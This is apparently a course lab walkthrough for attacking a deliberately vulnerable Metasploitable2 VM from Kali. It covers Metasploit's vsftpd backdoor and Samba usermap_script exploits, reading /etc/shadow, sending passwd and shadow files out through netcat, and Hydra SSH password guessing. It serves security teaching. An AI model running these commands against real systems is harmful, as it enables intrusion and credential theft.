Metasploit is an open source platform for vulnerability research, exploit development, and the creation of custom security tools. In this lab, we’re going to be using Metasploit to attack the Metasploitable2 VM.
Preqreq – have a local Kali instance and Measploitable2 VM running.
https://hack.technoherder.com/vm-setup-kali-metasploitable2/
Activities
Part 1 – Getting Started
Update Kali:
$ sudo apt update$ sudo apt upgrade
Start the Kali PostgreSQL service (which Metasploit uses as its backend):
# Will launch the service postgresql@14-main and then exit...
$ sudo systemctl start postgresql
Initialise the Metasploit PostgreSQL Database:
# Only do this ONCE, not every time!
$ sudo msfdb init
Launch msfconsole in Kali:
$ msfconsole
Verify database connectivity
msf6> db_status
# Should see:
# [*] Connected to msf. Connection type: postgresql.
Add a new workspace for this lab. A workspace allows you to label data collected (hosts, vulnerabilities, ….) for a specific project in the database
See Also: Managing Workspaces
msf6> workspace -a 178-metasploitable2
(Tip: If you need to select this workspace later, type workspace 178-metasploitable2
)
Review the currently configured workspaces. A *
marks the currently selected workspace.
msf6> workspace
Run nmap over the subnet where you know the metasploitable2 VM is running. The db_nmap
command will save the results of the nmap scan to the database. Use a -A
(ALL THE THINGS!) scan here because we know there are only a few systems in this subnet (metasploitable2, Kali, perhaps your host OS if you’re using VMware) and thus it won’t take too long
msf6> db_nmap -A xxx.xxxx.xxx.0/24
### e.g. 172.16.196.0/24
View the list of hosts found in the nmap scan:
# Verify that the IP address of your Metasploitable2 VM is listed here
msf6> hosts
View the list of services found in the nmap scan:
msf6> services
Deliverables:
- There are two FTP servers running on Metasploitable. What are they? For your answer, provide the text in the “info” column of the “services” report, and include the version numbers)
Part 2 – Exploiting VSFTPD
Let’s go exploit vsftpd! And learn about Metasploit searching in the process.
First, learn about how search works in Metasploit.
msf6> help search
Then, search for the first target FTP application – VSFTPD
msf6> search type:exploit name:vsftpd
Deliverables:
- How many exploits were found?
- What is the full path & name of the exploit? (starting with
exploit/...
)
Select the exploit you found
# Provide the full path to exploit here
msf6> use exploit/unix/.....
Briefly review the information that Metasploit has on this particular exploit
msf6> info
From the exploit information, there is a link to a pastebin.com URL that provides a code diff showing the malicious backdoor that was added to the server. Feel free to review the code, it’s a very simple backdoor. If the FTP username is a :)
smiley face, a TCP callback shell is launched.
See Also: https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
Deliverables:
- What is the pastebin.com URL with the code diff?
For the same exploit, briefly review the options that are available (i.e. might need to be correctly configured).
msf6> show options
Deliverables:
- What are the names of the two options that need to be set? Think of these as environment variables. The “R” stands for “Remote”. Answer in the order listed in Metasploitable.
Both of these options must be set for the exploit to target the correct host. Set them now with the information you previously learned about the Metasploitable2 VM:
# Must set remost host (IP address of Metasploitable2 VM)
msf6> set RHOSTS aaa.bbb.ccc.ddd
# Must set remote port
msf6> set RPORT XXXX
Now it’s time to RUN THE EXPLOIT!
msf6> exploit
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 172.16.196.174:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 172.16.196.174:21 - USER: 331 Please specify the password.
[+] 172.16.196.174:21 - Backdoor service has been spawned, handling...
[+] 172.16.196.174:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (172.16.196.173:45195 -> 172.16.196.174:6200) at 2020-02-12 12:20:15 -0800
Although you won’t see a command prompt, you now have one. Try typing Linux commands at the console.
Deliverables:
- Using the
whoami
command, what user are you running as via the exploit? - Using the
uname -a
command, what is the version of the Linux kernel running on the Metasploitable2 VM? Provide the full string.
Finally, obtain the hashed forms of the user passwords on the system for future analysis. On Linux systems, these are stored in the “shadow” file. Use this command to look at the /etc/shadow
file and only show lines where an account password has been set. (The others are non-login accounts, i.e. local-only)
cat /etc/shadow | grep '$1'
Deliverables:
- What are the hashed (“shadow”) forms of the user passwords on the system?
After answering this question, feel free to explore the shell, and then CTRL-C
to terminate this session and return to Metasploit.
If you want to leave this particular exploit, use the back
command
msf6> back
Part 3 – Exploiting Samba
Samba is an open source implementation of Microsoft file and printer sharing protocols, as well as Active Directory.
First, check the version of Samba that is running (shown in the earlier Nmap scan results). Then, look for exploits in Samba for that version.
msf6> search type:exploit name:samba
Deliverables:
- What version of Samba is running on the Metasploitable2 VM? (Give the full “info” string from the earlier nmap scan)
- How many exploits in Samba (not “Sambar”) does Metasploit currently have? (Note that the labels begin at zero…)
At first glance, checking for version numbers isn’t particularly helpful here. The description either doesn’t include applicable version numbers or the versions listed are older than what we’re targeting. There aren’t that many – maybe we try them all? Or just the ones with a rank of excellent and great? (Or just Google to find out which one Metasploitable2 is susceptible to?)
msf6> use exploit/multi/samba/usermap_script
msf6> info
# Must set remost host (IP address of Metasploitable2 VM)
msf6> set RHOSTS aaa.bbb.ccc.ddd
msf6> exploit
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 172.16.196.2:4444
[*] Command shell session 2 opened (172.16.196.2:4444 -> 172.16.196.4:56315) at 2021-01-20 15:21:59 -0800
Although you won’t see a command prompt, you now have one. Try typing Linux commands at the console, such as whoami
.
Deliverables:
- What CVE number was this particular vulnerability in Samba assigned?
- What versions of Samba were susceptible to this vulnerability?
- After using the Samba exploit, what command could you use to confirm the specific version of Samba that is running on the Metasploitable2 VM? Google will help you with a simple command to run on the remote host to obtain this information.
Now that you have access to the Metasploitable2 system via another exploit, let’s try another way to get access to the /etc/passwd
and /etc/shadow
files on the system – exfiltrating them via Netcat instead of manual copy and paste. This method can also be used to exfiltrate arbitrary files.
See also: Basic methods for data exfiltration
On the Kali system at a regular (not msf6) command prompt, run the Netcat utility, listening, on port 4567
# Netcat will wait and receive data into the file for FOREVER
$ nc -l -p 4567 > passwd.txt
On the exploited system command prompt, pipe the contents of the /etc/passwd
file to the Netcat utility, which is set to connect to Kali at the IP and port specified:
# Update command with the IP address of your Kali VM
cat /etc/passwd | nc xxx.xxx.xxx.xxx 4567
There will be no progress bar or other sign of activity. However, you already know the file is small, so it should transfer quickly. No need to wait for it. Go back to the “listening” netcat, kill it with a CTRL-C and inspect the contents of the passwd.txt
file using the cat
utility. Does it have the data you were expecting? If so, good! If not, re-check your commands and try again until you’ve exfiltrated the passwd file.
Modify and repeat those two commands to exfiltrate the /etc/shadow
file as well.
In this particular instance, it is more helpful to combine the passwd
and shadow
files together into a single file for future password-cracking (next lab!). Use the unshadow
command on the Kali host to merge those two files together, and save it for later.
$ unshadow passwd.txt shadow.txt > metasploitable_logins.txt
Feel free to explore the exploit shell, and then CTRL-C to terminate this session and return to Metasploit.
Deliverables:
- What is the contents of the merged
metasploitable_logins.txt
file?
Part 4 – Hydra
Hydra is a brute force parallelized login cracker which supports numerous protocols to attack via online attacks, including: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Use Hydra to do online password guessing against a single username in Metasploitable2. How do we know this usernames? Multiple ways: From accounts on other systems, from email addresses, from likely combinations of human names, or just by guessing (root, admin, Administrator, user, etc…)
Run xhydra
(the GUI version of the command-line hydra
) with the following settings:
- Crack the
sys
username, - over the SSH (secure shell) protocol,
- with 4 concurrent tasks (a.k.a. threads) to avoid swamping the server and having it drop requests,
- and using the basic password file from John the Ripper at
/usr/share/john/password.lst
Deliverables:
- What is the command-line invocation that the GUI built from setting those specified options? It’s shown at the bottom of the window.
- From the in-progress password crack attempt, how many attempts per minute is Hydra attempting?
- How long did it take Hydra to find this common password?
- What was the password for that account?
Part 5 – Exploiting Something Else
It’s time for you to explore Metasploit!
Using Metasploit and your Google skills, discover another exploit that works on the Metasploitable2 VM. There are many described online in blogs and tutorials, or you could use the list of services and search functionality to pull out a vulnerability without external knowledge.
Deliverables:
- What service is the vulnerability in?
- What is the full name (
exploit/...
) of the vulnerability in Metasploitable? - What options does the exploit need to function?
- How does the vulnerability/exploit work?